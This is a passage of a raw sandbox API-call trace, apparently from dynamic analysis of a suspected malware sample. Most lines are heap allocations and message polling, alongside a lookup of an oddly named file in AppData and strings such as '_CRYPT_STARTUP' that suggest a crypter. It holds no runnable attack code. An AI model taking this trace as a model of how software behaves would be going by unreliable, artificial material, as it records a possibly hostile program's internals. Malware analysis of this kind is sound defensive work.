Flags=0x0, Size=0x8) returned 0x2e54ef8 [0231.997] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0232.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.040] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50488 [0232.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.041] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/Hr9y61oAkM-K.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b122980, ftCreationTime.dwHighDateTime=0x1d5ed6b, ftLastAccessTime.dwLowDateTime=0x6a09f990, ftLastAccessTime.dwHighDateTime=0x1d5e0c7, ftLastWriteTime.dwLowDateTime=0x6a09f990, ftLastWriteTime.dwHighDateTime=0x1d5e0c7, nFileSizeHigh=0x0, nFileSizeLow=0x140f4, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="Hr9y61oAkM-K.flv", cAlternateFileName="HR9Y61~1.FLV")) returned 0xa87410 [0232.041] FindClose (in: hFindFile=0xa87410 | out: hFindFile=0xa87410) returned 1 [0232.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0232.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e48 | out: hHeap=0x970000) returned 1 [0232.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50488 | out: hHeap=0x970000) returned 1 [0232.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0232.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 [0232.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0232.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fa58 | out: hHeap=0x970000) returned 1 [0232.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.041] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0232.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f850 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0232.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0232.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.042] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.042] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0232.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0232.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50f08 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0232.042] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0232.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0232.042] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50dd0 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0232.043] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69c08 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69c08 | out: hHeap=0x970000) returned 1 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0232.043] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7fa58 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0232.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0232.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f8f0 [0232.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0232.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0232.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0232.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0232.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0232.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0232.044] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ed8 | out: hHeap=0x970000) returned 1 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0232.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.045] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04508 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.045] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0232.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04508 | out: hHeap=0x970000) returned 1 [0232.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cf8 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0232.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50da0 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0232.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50db8 | out: hHeap=0x970000) returned 1 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0232.045] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0232.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0232.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0232.046] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f968 | out: hHeap=0x970000) returned 1 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0232.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0232.046] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0232.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0232.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f968 [0232.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50de8 [0232.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0232.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.047] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f378 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e18 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.047] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f878 | out: hHeap=0x970000) returned 1 [0232.047] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.048] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550a8 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.048] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0232.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0232.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0232.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0232.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0232.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cf8 | out: hHeap=0x970000) returned 1 [0232.048] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cf8 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0232.048] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0232.048] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0232.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f043b8 | out: hHeap=0x970000) returned 1 [0232.048] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0232.049] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0232.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0232.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f38 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0232.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e48 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0232.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0232.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0232.049] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f878 [0232.049] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f20 | out: hHeap=0x970000) returned 1 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0232.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0232.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0232.050] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0232.050] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 